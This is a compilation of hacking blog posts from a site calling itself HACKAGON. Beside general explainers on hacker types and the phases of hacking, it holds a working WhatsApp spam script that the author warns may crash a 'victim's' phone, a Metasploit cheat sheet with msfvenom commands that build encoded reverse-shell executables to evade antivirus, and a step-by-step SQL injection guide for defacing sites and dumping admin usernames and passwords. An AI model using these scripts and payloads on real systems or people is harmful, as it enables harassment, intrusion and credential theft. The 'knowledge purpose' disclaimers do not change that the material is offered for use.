We’re Done. . .The antivirus is taken care of and can no longer interfere with our further activities. Ideally, you want to make sure that you’re hidden before trying out any hacks.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, we hope that our readers will maintain their anonymity and stay safe. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


We know everybody is talking about WhatsApp Hacking nowadays. So here in HACKAGON, we came up with the Spamming idea by adding a JavaScript Code Snippet in the WhatsApp Web by which we can automate the number of messages to send on the respective chat of particular Friend/Group by using WhatsApp Spammer Code.

WhatsApp Spammer

What Is WhatsApp Spammer ??

In simple words we can say that by using WhatsApp Spammer JavaScript Code Snippet, We can send any number of messages to our any WhatsApp Contact/Group without taking the effort of writing and pressing the send button for a particular message again and again.

WhatsApp Spammer JavaScript Code Snippet

// for send function to select input
function dispatch(target, eventType, char) {
var evt = document.createEvent(“TextEvent”);   
evt.initTextEvent (eventType, true, true, window, char, 0, “en-US”);
target.focus();
target.dispatchEvent(evt);
}

// enters input and clicks button
function send(msg){
a=document.getElementsByClassName(‘input’)[1];
dispatch(a,”textInput”,msg);
document.getElementsByClassName(‘icon-send’)[0].click();
}

// For Loop to spam. Edit “i<500” to customize

for(i=0;i<500;i++)
    send(“Let Me Spam You ” +i);

Steps To Use Above Code For WhatsApp Spamming

  1. Open your WhatsApp Web.
  2. Open the respective chat of particular Friend/Group.
  3. Copy the above given code and paste it into your Notepad so that you can edit it for the number of message repetitions as you wish.
  4. Edit the For Loop in code and put the number of messages you want to send/repeat (Here I’ve used “i<500” so the receiver will receive 500 messages ) and you can also edit the message string as you wish.
  5. Now just right-click on the WhatsApp Web and opt for Inspect Element/Inspect or Simply hit the F12 button.
  6. Copy paste the edited code on the Console & hit Enter.
  7. Done!!

Go easy on the Number of Repetitions, As this might crash your Friend’s/Victim’s Phone & WhatsApp.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, we hope that we provided the best WhatsApp Hack to have fun with your friend’s. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Metasploit is an open source computer security project. Metasploit is not a single tool but a framework which is used for developing and executing exploit code against the Remote Target. Using Metasploit we can exploit most of the vulnerabilities that exist in a software and that is the only reason that makes us point out the Metasploit Tools And Cheat Sheet for the HACKAGON‘s readers.

Metasploit Tools And Cheat Sheet

The purpose of this Metasploit Tools And Cheat Sheet is to describe some common options for some of the various components of the Metasploit Framework.

Tools Described

Metasploit: The Metasploit Framework is a development platform for developing and using security tools and exploits.

Metasploit Meterpreter: The Meterpreter is a payload within the Metasploit Framework that provides control over an exploited target system, running as a DLL loaded inside of any process on a target machine.

Metasploit msfvenom: The msfvenom tool is a component of the Metasploit Framework that allows users to generate a standalone version of any payload within the framework. Payloads can be generated in a variety of formats including executable, Ruby script, and raw shellcode. The msfvenom tool can also encode payloads to help avoid detection.

Meterpreter Post Modules

With an available Meterpreter session, post modules can be run on the target machine.

Post Modules from Meterpreter
meterpreter > run post/multi/gather/env

Post Modules on a Backgrounded Session
msf > use post/windows/gather/hashdump
msf > show options
msf > set SESSION 1
msf > run

Useful Auxiliary Modules

Port Scanner
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

DNS Enumeration
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server
msf > use auxiliary/server/socks4
msf > run

Any proxied traffic that matches the subnet of a route will be routed through the session specified by route and use proxychains configured for socks4 to route any application’s traffic through a Meterpreter session.

Metasploit Console Basics (msfconsole)

Search for module
msf > search [regex]

Specify and exploit to use
msf > use exploit/[ExploitPath]

Specify a Payload to use
msf > set PAYLOAD [PayloadPath]

Show options for the current modules
msf > show options

Set options
msf > set [Option] [Value]

Start exploit
msf > exploit

Metasploit Meterpreter

Base Commands

? / help: Displays a summary of commands.
exit / quit: Exit the Meterpreter session.
sysinfo: Shows the system name and OS type.
shutdown / reboot: Self-explanatory.

File System Commands

cd: Changes the directory.
lcd: Changes directory on local (attacker’s) machine.
pwd / getwd: Displays current working directory.
ls: Shows the contents (List) of the directory.
cat: Displays the contents of a file on the screen.
download / upload: Move files to/from the target machine.
mkdir / rmdir: Make / remove directory.
edit: Open a file in the default editor (typically vi).

Process Commands

getpid: Displays the process ID that Meterpreter is running inside.
getuid: Displays the user ID that Meterpreter is running with.
ps: Displays process list.
kill: Terminates a process given its process ID.
execute: Runs a given program with the privileges of the process, the Meterpreter is loaded in.
migrate: Jump to a given destination process ID.
                – Target process must have same or lesser privileges.
                – Target process may be a more stable process.
                – When inside a process, can access any files that the process has a lock on.

Network Commands

ipconfig: Shows network interface information.
portfwd: Forward packets through TCP session.
route: Manage/view the system’s routing table.

Misc Commands

idletime: Displays the duration that the GUI of the target machine has been idle.
uictl [enable/disable] [keyboard/mouse]: Enables/disables either the mouse or keyboard of the target machine.
screenshot: Saves the screenshot of the target machine.

Additional Modules

use [module]: Loads the specified module.

Example
use priv: Loads the previous module.
hashdump: Dump the hashes from the box.
timestomp: Alter NTFS file timestamps.

Metasploit msfvenom

The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Runs with ‘‘-l payloads’ to get a list of payloads.

$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse connection)]
LPORT=[LocalPort]

Example Reverse Meterpreter payload as an executable and redirected to a file:

$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe

Format Options (specified with –f)

–help-formats: List available output formats
exe: Executable
pl: Perl
rb: Ruby
raw: Raw shellcode
c: C code

Encoding Payloads with msfvenom: The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders‘ to get a list of encoders.

$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse connection.)]
LPORT=[LocalPort]

Example: Encode a payload from msfpayload 5 times using shikata_ga_nai encoder and output as executable

$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Managing Sessions

Multiple Exploitation

Run the exploit expecting a single session that is immediately backgrounded
msf > exploit -z

Run the exploit in the background expecting one or more sessions that are immediately backgrounded
msf > exploit –j

List all current jobs (usually exploit listeners)
msf > jobs –l

Kill a job
msf > jobs –k [JobID]

Multiple Sessions

List all backgrounded sessions
msf > sessions -l

Interact with a backgrounded session:
msf > session -i [SessionID]

Background the current interactive session:
meterpreter > <Ctrl+Z> (OR meterpreter > background)

Routing Through Sessions

All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, we hope that we provided some useful knowledge about Metasploit & it’s Tools used for Hacking so that readers can begin their Hacking career with an ease. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Programming Languages For Hacking: Every hacking beginner can have plenty of doubts like: “Which programming language should I learn for Hacking ?”, “How to become A professional Pentester / Hacker ?” etc.

Programming Languages For Hacking

When we talk about COMPUTERS then everything related to them depends on programming because, without SOFTWARE, any piece of HARDWARE is nothing but a collection of scrap. But with a beautiful stream of 1’s and 0’s which is also known as BINARY, it can almost literally be pumped full of life. Whatever we see and do on our mobiles and computers and every new gadget as well as applications these days were created by someone, somewhere who night after night tirelessly written the code to create something wonderful for the world.

The users often don’t fully comprehend exactly what goes on behind the scenes of any decent piece of software. For this reason, here’s a little reality check before we get to the main topic. A line of code (LoC) is a single average line in a program and usually contains around 40-50 characters.

  • The Unix 1.0 OS (1970) contained about 10,000 lines of code.
  • An average iOS or android app has approximately 50,000. That is 50,000 lines typed word by word by some coder, and we’re just getting started.
  • Photoshop CS6 clocks in at a freaky 5 million LoC.
  • Firefox browser is of around 10 million.
  • We’ve got Windows 7 at 40 million and guess what? Microsoft office is actually bigger than the parent OS itself (about 45 million LoC).

What’s The Point Of Notifying All This ??

Programming is not actually as we pictured above. we know it takes effort but not that much. The truth is, Lines of Code is a poor way to measure the difficulty of coding. It’s like measuring a person’s success by counting the number of words they’ve spoken, ridiculous and not really related.

The point to state all of the above is to prove wrong all of them who overstate and exaggerate the difficulty of learning how to program. It’s almost always pictured as something unbelievably boring, dry, dull and geeky. As we see in movies, we pictured a programmer as a nerdy guy with huge spectacles sitting in front of the computer tirelessly typing away while all that s/he accomplishes is something wonderful. Undoubtedly, the programming can only be done by someone who thoroughly enjoys it. It’s different for everyone which is why you should actually find out if the programming is for you or not, you need to try it out for yourself.

How Exactly The Programming & Hacker Is Related ??

Programming teaches you the logics and the way to think. It develops the problem-solving capability and most importantly, it is what differentiates you from the SCRIPT KIDDIES. If the hacks are carried out through the tools developed by others, then that person has no rights to be known as a “Hacker”. If you ever tried googling about hacking and gave up soon without finding an answer, you’re not alone. The main reason most hackers are not big on helping others is because they start getting bombarded by noobs asking them to hack FB/Whatsapp/Twitter accounts and explain something so basic and silly that they just give up and start ignoring them. Programming helps you understand how everything in your smarter idiot box comes together. It gives you better knowledge about how to identify and solve any problems by yourself. By knowing programming, you get a better understanding of how vulnerabilities and exploits work.

Most importantly a hacker can code their own tools, scripts, exploits, shell codes, entire applications and modify existing ones according to their own needs. In programming, Hackers can be expected to identify the problems and find the way through them with logical thinking.

Why Programming ??

The first question, many people will ask, is why should I learn any programming language when there are so many tools and Frameworks such as MSF (Metasploit framework) to do my job. All I need to know is how the tool works and what is the purpose of it. The Answer to the question is both yes and no. You can become a Pentester/Hacker without knowing any programming, however, you are not going to become a GOOD pentester/Hacker.

So Knowing Programming Will:

  • Differentiate you from Script Kiddies and Tool Lovers.
  • Help You in Understanding About Vulnerabilities.
  • Help You in writing Your own tools, scripts.
  • Help You in writing exploits, Shell codes etc.
  • Help You modifying Existing scripts, tools according to your needs.

Where To Start ??

All you have to do is to pick a Programming Language and dive in but the question is still there “Which one ?”. There’s simply no right or wrong answer to this question. But the truth is, you have to learn quite a few languages for hacking, preferably as many as possible. Even if you will not need to code in every language, but you should understand how to read it at least. No language is perfect as each one has its pros and cons. You can do the same thing in a million different ways with a dozen programming languages. The time spent analyzing these useless facts could better be spent actually learning something. There is nothing to gain from comparing languages. Actually, the difference between languages is almost like the difference between “Hello”, “Hi” and “Hey”. Although languages like HTML, SQL, Java are used for different things, it really doesn’t matter where you start since you should learn as many languages as you can.

So now that you have understood the importance of knowing programming, the next question in your mind is which programming language should I learn – the answer to this question depends on your interests and goals.

Programming Languages For Hacking:

1# For Web App / Pentesting / Hacking:

HTML: Hypertext Markup Language (HTML) is the basics for creating web pages and other information that can be displayed in a web browser. So if you don’t know HTML you should first learn it.

JavaScript: Learning JavaScript. It will help you to understand the basics of Cross Site Scripting.

PHP / SQL: The majority of web applications are written using PHP and MySQL. So it is a must to learn PHP.

2# For Writing/Understanding Exploits, Shell Codes, Rootkits etc:

C & C++: More than 60 % of the exploits you will find on the web are written in C & C ++. Learning C & C++ will help you to understand about Buffer overflows, Stack overflow etc – so learning C and C ++ is a must for every Hacker/Pentester.

Assembly: Learning assembly will help you in Writing/understanding Shell codes, it will also help you in Reverse Engineering applications and software’s.

3# For Building Tools And Scripts:

Python: Python is a very powerful high-level language, it’s easy to learn and code, most of the tools and scripts for automation are written in Python. Knowing Python socket programming will help you a lot in Exploit writing.

Ruby: Ruby is an another language which is used to write scripts, tools. Metasploit Framework is written in Ruby. Learning ruby will help you understand the in and outs of MSF.

Bash: Learning Bash is very useful in writing small scripts for automation.

So, we hope that we provided some useful knowledge about Programming Languages used for Hacking so that readers can begin their Hacking career with an ease. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Hacker is a term used by some to mean “A Clever Programmer” and by others, especially those in popular media, to mean “Someone Who Tries To Break Into Computer Systems”. The term “Hacking” historically referred to constructive, clever technical work that was not necessarily related to computer systems. Today, however, hacking and hackers are most commonly associated with malicious programming attacks on the Internet and another network and that makes a perfect reason to know about the different Types Of Hacker.

Types Of Hacker

Let’s Understand The Different Types Of Hacker & Their Work Culture:

1# White Hat Hacker:

The term “White Hat Hacker” in Internet slang refers to an ethical computer Hacker, or a Computer Security Expert, who specializes in penetration testing and in other testing methodologies to ensure the security of an organization’s information systems. White Hats are the good guys who hack for security purposes. Although what they do is pretty much the same as bad guys, but a world of difference arises when it comes to ethics. The main aim of a White Hat Hacker is to improve the security of a system by finding security flaws and fixing it before the bad guys to find and exploit it. They are usually officially employed by organizations and companies to protect their virtual assets from coming to harm. They may work also individually to make the cyberspace more secure, kind of a voluntary worldwide community service.

2# Black Hat Hacker:

A Black Hat Hacker (Also known as Crackers or Dark-Side Hackers) are an individual with extensive computer knowledge whose purpose is to breach or bypass internet security. The general view is that, while hackers build things, crackers break things. They are the bad guys, cyber criminals who have malicious intents. These are the hackers who steal money or valuable data, infect systems with Viruses, Trojans, and Malware etc. These are the ones who gave the world of hacking a bad reputation and it is up to us, the White Hats to bring them down. They use their hacking skills for illegal purposes with unethical goals and sometimes just to watch the world burn.

3# Grey Hat Hacker:

The term “Grey Hat Hacker” in Internet slang, refers to a Computer Hacker or Computer Security Expert whose ethical standards fall somewhere between purely altruistic and purely malicious. The term began to be used in the late 1990s, derived from the concepts of “White Hat” and “Black Hat” Hackers. These are the hackers who may work offensively or defensively, depending on the situation. They belong to the neutral zone. These types of hackers are not inherently malicious with their intentions; they’re just looking to get something out of their discoveries for themselves. Usually, Grey Hat Hackers never exploit the found vulnerabilities. However, this type of hacking is still considered illegal because the hacker did not receive permission from the owner prior to attempting to attack the system.

4# Hacktivist:

Hacktivist (A portmanteau of Hack and Activist) is the subversive use of computers and computer networks to promote a political agenda. With roots in hacker culture and hacker ethics, its ends are often related to the free speech, human rights, or freedom of information movements. These are the hackers who use their hacking skills for protesting against injustice and attack a target system or websites to popularize a notion or gather attention to a specific case for rectification. They are vigilantes, the dark knights of the Hacking Universe. This is where good intentions collide with the law, for Hacktivists may or may not carry out illegal activities to get their point across to the world. They include outlaws who deliver their own brand of rough justice; they are usually experts confident in their stealth skills so as not to get caught.

5# Script Kiddies:

Script Kiddies (Also known as Skid/Skiddie/Script Bunny), In programming and hacking culture, a script kiddie is an unskilled individual who uses scripts or programs developed by others to attack computer systems and networks and deface websites. In a word, we can say them noobs. They are the ones who don’t know how a system works but are still able to exploit it with previously available tools, not by walking in the footsteps of actual Hackers but simply copying what they did and using it for malicious purposes. A script kiddie is that one annoying kid in class, who pisses off everyone else. So don’t ever try to be a Skid.

Hope we’ve provided the best explanations for the types of hackers. So, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Traditionally, a hacker is someone who likes to tinker with software or electronic systems. Hackers enjoy exploring and learning how computer systems operate. They love discovering new ways to work electronically. So Here in HACKAGON, we’ll tell you What Is Hacking and the misconceptions about it.

What Is Hacking

What Is Hacking ?

Technically, Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator’s original purpose. The person who is consistently engaging in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a Hacker. In the cyber security world, the person who is able to discover a weakness in the system and manages to exploit it to accomplish his goal (Good or Bad) is referred as a Hacker, and the process is referred as Hacking.

Computer hacking is the most popular form of hacking nowadays, especially in the field of computer security, but hacking exists in many other forms, such as phone hacking, brain hacking, etc. and it’s not limited to either of them. Nowadays, People think that hacking is only hijacking Facebook accounts or defacing websites. Yes, it is also part of the hacking field but it doesn’t mean that it is all there is. This is not even the tip of the iceberg.

What does the term Hacking exactly means and what should you do to become a Hacker? That is exactly what we are going to discuss here in HACKAGON.

Ethical Hacking (Also known as Penetration Testing or White-Hat Hacking) Involves the same tools, tricks, and techniques that Black Hat Hackers use, but with one major difference: Ethical hacking is legal. Ethical hacking is performed with the target’s permission. The intent of ethical hacking is to discover vulnerabilities from a hacker’s viewpoint so systems can be better secured. It’s part of an overall information risk management program that allows for ongoing security improvements. Ethical hacking can also ensure that vendors’ claims about the security of their products are legitimate. The only thing you need to become a hacker is interest and dedication. You should always be ready to learn something new and learn to create something newer.

Hacking is the practice of modifying the features of a system or finding a loophole, in order to accomplish a goal outside of the creator’s original purpose but due to the mass attention given to the so-called “Blackhats” or “Crackers” from the media, the reputation of all hackers, even the good ones is damaged. This is what HACKAGON is for – To turn this image around. Hacking is always viewed as something illegal and shrewd. This is almost never the case. A few bad guys doing a few bad things have put a bad name on an entire community.

So, we hope that we provided some healthy and hygienic knowledge about Hacking so that readers can begin their Hacking career with proper ethics. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


Hacker Highschool Books are designed to encourage you to be well-rounded and resourceful. The core instruction theme is to harness the hacker curiosity in you and to guide you progressively through your hacker education to help you grow into a responsible role, capable of determining security and privacy problems and making proper security decisions for yourself. So, Here in HACKAGON readers can download these books FREE OF COST so that they can learn them offline.

JUST CLICK ON THE BOOKS AND DOWNLOAD HACKER HIGHSCHOOL BOOKS FOR FREE

Complete Table Of Contents And Glossary        Being A Hacker        Basic Commands In Linux And Windows

Ports And Protocols        Services And Connections        System Identification

Malware        Attack Analysis        Digital Forensics

E-Mail Security        Web Security And Privacy        Passwords

Internet Legalities And Ethics

Note: – This Books are only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like these free collection of Hacker Highschool Books. So, don’t forget to share it with your friends and also feel free to drop a comment below if you have any query or feedback.


SQL Injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. So, Let’s Learn How To Deface Websites Using SQL Injection With HACKAGON.

last injection

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

What Is Website Defacement ??

Website defacement is an attack on a website that changes the visual appearance of the site or a web page. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own. Defacement is generally meant as a kind of electronic graffiti and, as other forms of vandalism, is also used to spread messages by politically motivated “Cyber Protesters” or “Hacktivists”.

Defacing a website simply means replacing the index.html file of a site by attacker’s own file. Now all the users who’ll open the website will see the page uploaded by the attacker.

Steps To Deface Websites Using SQL Injection:

1) Vulnerability Check:

To check a vulnerable website for SQL Injection, you need to find a page that looks like this –
http://www.website.com/news.php?id=1

Now to test if it’s vulnerable, we add a ‘ (quote) to the end of URL and that would look like –
http://www.website.com/news.php?id=1′

If the database is vulnerable, the page will spit out a MySQL error something similar to –
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”

And that means the Site is vulnerable to SQL injection but if the page loads as normal then the website is not vulnerable to SQL Injection.

2) Finding the number of columns: 

To find the number of columns in the database, we’ll use the statement ORDER BY which tells the database how to order the result. Well just incrementing the number until we get an error.

http://www.website.com/news.php?id=1 order by 1/*      <– No Error
http://www.website.com/news.php?id=1 order by 2/*      <– No Error
http://www.website.com/news.php?id=1 order by 3/*      <– No Error
http://www.website.com/news.php?id=1 order by 4/*      <– Error

We’ll get message like this: Unknown column ‘4’ in ‘order clause’ or something like that which means the database has 3 columns, as we got an error on 4.

3) Check for UNION function: 

We now are going to use the “UNION” command to find the vulnerable columns because with the union command we can select more data in one SQL statement. So we have –
http://www.website.com/news.php?id=1 union all select 1,2,3/* (As we’ve already found that the number of columns is 3 in the second step.)

If we see some numbers on the screen, i.e 1 or 2 or 3 then the UNION works.

4) Check for DataBase Version:

We now need to find the database version, name, and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
Or if these don’t work then try:
@@user
@@version
@@database

The URL would look like:
http://www.website.com/news.php?id=1 union all select 1,user(),version(),3/*

If you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …” Then what we need is convert() function (I didn’t see any website article covering this problem, So I must cover it.)

i.e. http://www.website.com/news.php?id=1 union all select 1,convert(@@version using latin1),3/*

Or with hex() and unhex()

i.e. http://www.website.com/news.php?id=1 union all select 1,unhex(hex(@@version)),3/*

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.

IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

5) Obtaining Table And Column Name:

In this step, We aim to list all the table names in the database. The “table_name” goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables. But in most of the cases, we must guess table and column name.

common table names are: user/s, admin/s, member/s, etc.

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc.

URL would be http://www.website.com/news.php?id=1 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good)

We know that table admin exists. . .Now to check column names –

http://www.website.com/news.php?id=1 union all select 1, username, 3 from admin/* (if you get an error, then try the other column name)

We get username displayed on the screen, the example would be the admin, or superadmin etc. . .Now to check if column password exists –
http://www.website.com/news.php?id=1 union all select 1, password, 3 from admin/* (if you get an error, then try the other column name)

We’ll see the password on the screen in Hash or Plain-Text format, it depends on how the database is set up i.e md5 hash, mysql hash, sha1, etc.

Now we must complete query as of our need. And for that, we can use concat() function (it joins the strings).
i.e. http://www.website.com/news.php?id=1 union all select 1, concat(username,0x3a,password),3 from admin/*

Note: Here, I used 0x3a, its hex value for colon)
(The another way is to use ASCII Value for that. Example: char(58))

http://www.website.com/news.php?id=1 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get displayed username: password on screen, i.e admin: admin or admin: HACKAGON

When you have this, you can login like admin or some superuser. If can’t then guess the right table name, you can always try mysql.user (Default). It has user password columns, So the URL would be
http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6) Incase of MySQL 5:

Uptil step 5 is for MySQL version < 5 (i.e 4.1.33, 4.1.12, etc.) But for MySQL 5 we need information_schema. It holds all tables and columns in the database. To get tables, we use table_name and information_schema.tables.
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables/*

Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables.
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
Note: Here, I put 0,1 (Get 1’s result starting from the 0th)

Now to view the second table, we’ll change limit 0,1 to limit 1,1
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

The second table is displayed. Now for the third table, we put limit 2,1
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing the limit until you get some useful table like db_admin, poll_user, auth, auth_user, etc.

To get the column names, the method will be the same. Where we use column_name and information_schema.columns.

The method will be as same as above. So the example would be –

http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is diplayed. The second one (we change limit 0,1 to limit 1,1)
i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing the limit until you get something like username, user, login, password, pass, passwd, etc.

If you wanna display column names for specific table use this query (where clause). Let’s say that we found table users.
i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*

Now we’ll get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note: This wouldn’t work if the magic quotes are ON.

Let’s say that we found columns user, pass, and email. Now complete the query to put them all together. For that we use concat(), As I used it earlier.
i.e. http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/

We’ll get here user:pass:email from table users. Example: admin:hash:xyz@abc.com

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.


HACKING meant to possess extraordinary computer skills able to extend the limits of computer systems and besides that understanding, the victim is an essential component of a successful defense. However, today there are automated tools and codes available on the Internet that make it possible for anyone with a will and desire to hack and succeed. The ease with which system vulnerabilities can be exploited increased while the knowledge curve required to perform such exploits shortened. The concept of the elite/super hacker is an illusion. So HACKAGON listed down the Phases Of Hacking for the ease of HACKERS.

However, hackers are generally intelligent individuals with good computer skills and the ability to create and explore into the computer’s software and hardware. Their intention can be either to gain knowledge or dig around to do illegal things. Attackers are motivated by the zeal to know more while malicious attackers intend to steal data.

Phases Of Hacking Hackagon

About Phases Of Hacking:

The process could be divided into five distinct phases. There are different models but this one is common. White, black or grey hat hackers use the equivalent process. So, it is also important to understand the sequence of phases. Indeed, the result or the output of a phase is used in the following. It is not enough to run just security tools. It is vital to understand the order in which they are used to perform a penetration test complete and realistic.

Five Phases of Hacking

Phase#1  Reconnaissance

Reconnaissance is probably the longest phase, sometimes lasting weeks or months.  The black hat uses a variety of sources to learn as much as possible about the target victim and how it operates, including:

  • Internet searches
  • Social engineering
  • Dumpster diving
  • Domain names management/search services
  • Non-intrusive network scanning

The activities in this phase are not easy to defend against.  Information about an organization finds its way to the Internet via various routes.  Employees are often easily tricked into providing tidbits of information which, over time, act to complete a complete picture of processes, organizational structure, and potential soft spots.  However, there are some things you can do which make it much harder for an attacker, including

  • Make sure your systems don’t leak information to the Web, including:
    • Software versions and patch levels
    • Email addresses
    • Names and positions of key personnel
  • Ensure proper disposal of printed information
  • Provide generic contact information for domain name registration lookups
  • Prevent perimeter LAN/WAN devices from responding to scanning attempts

Phase#2  Scanning And Enumeration

Once the attacker has enough information to understand how the business works and what information of value might be available, he or she begins the process of scanning perimeter and internal network devices looking for weaknesses, including:

  • Dialers
  • Port scanners
  • Internet Control Message Protocol (ICMP) scanners
  • Ping sweeps
  • Network mappers
  • Simple Network Management Protocol (SNMP) sweepers
  • Vulnerability scanners

Scans of perimeter and internal devices can often be detected with intrusion detection (IDS) or prevention (IPS) solutions, but not always.  Veteran black hats know ways around these controls.  In any case, some steps you can take to thwart scans include

  • Shutting down all unneeded ports and services
  • Allow critical devices, or devices housing or processing sensitive information, to respond only to approved devices
  • Closely manage system design, resisting attempts to allow direct external access to servers except under special circumstances and constrained by end-to-end rules defined in access control lists
  • Maintain proper patch levels on endpoint and LAN/WAN systems

Phase#3  Gaining Access

Gaining access to resources is the whole point of a modern-day attack.  The usual goal is to either extract information of value to the attacker or use the network as a launch site for attacks against other targets.  In either situation, the attacker must gain some level of access to one or more network devices.

In addition to the defensive steps described above, security managers should make every effort to ensure end-user devices and servers are not easily accessible by unauthenticated users.  This includes denying local administrator access to business users and closely monitoring domain and local admin access to servers.  Further, physical security controls should detect attempts at a hands-on attack, and delay an intruder long enough to allow effective internal or external human response (i.e., security guards or law enforcement).

Finally, encrypt highly sensitive information and protect keys.  Even if network security is weak, scrambling information and denying attacker access to encryption keys is a good final defense when all other controls fail.  But don’t rely on encryption alone.  There are other risks due to weak security, such as system unavailability or use of your network in the commission of a crime.

Phase#4  Maintaining Access

Having gained access, an attacker must maintain access long enough to accomplish his or her objectives.  Although an attacker reaching this phase has successfully circumvented your security controls, this phase can increase the attacker’s vulnerability to detection.

In addition to using IDS and IPS devices to detect intrusions, you can also use them to detect extrusions.  A short list of intrusion/extrusion detection methods, described in Chapter 3 – Extrusion Detection Illustrated (Extrusion Detection: Security Monitoring for Internal Intrusions, Richard Bejtlich, 2006), includes

  • Detect and filter file transfer content to external sites or internal devices
  • Prevent/detect direct session initiation between servers in your data center and networks/systems not under your control
  • Look for connections to odd ports or nonstandard protocols
  • Detect sessions of unusual duration, frequency, or amount of content
  • Detect anomalous network or server behavior, including traffic mix per time interval

Phase#5  Covering Tracks

After achieving his or her objectives, the attacker typically takes steps to hide the intrusion and possible controls left behind for future visits.  Again, in addition to anti-malware, personal firewalls, and host-based IPS solutions, deny business users local administrator access to desktops.  Alert on any unusual activity, any activity not expected based on your knowledge of how the business works.  To make this work, the security and network teams must have at least as much knowledge of the network as the attacker has obtained during the attack process. Examples of activities during this phase of the attack include

  • Steganography
  • Using a tunneling protocol
  • Altering log files

This article about Phases Of Hacking is not intended to make you an expert in network defense. Instead, it should serve as an introduction to methods employed by black hat hackers when compromising an information resource. Armed with this information, security professionals are better prepared to prepare for battle, locating and engaging the enemy wherever or whenever necessary.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this article. So, doesn’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.


Whether you’re a HACKER or a Normal Person, chatting is a familiar habit for everybody to deal with. But sometimes the so-called insecurity factor come forth and we want to maintain anonymity in our chat. So HACKAGON will show you the way to create your own Hacker Style Disposable Chat Room that destroys itself when the chat’s over.

Disposable Chat Room

Steps To Create Disposable Chat Room:

  1. Visit https://hack.chat by just clicking on it.
  2. Add a “?” and a String of text to the URL. For example, https://hack.chat/?HACKAGON will create a Disposable Chat Room named “HACKAGON” (You can use whatever name you want).disposabe chat room hackagon
  3. Then it’ll ask for your nickname to chat with, So Enter a nickname whatever you want and you are ready to chat.
  4. Share your personal chat room URL to anyone you want to talk in private.

There are no channel lists kept anywhere, so random people won’t show up in your hack.chat. Formatting is possible with LaTeX markup, too. A chatroom can be disposed at any point after the completion of chats.

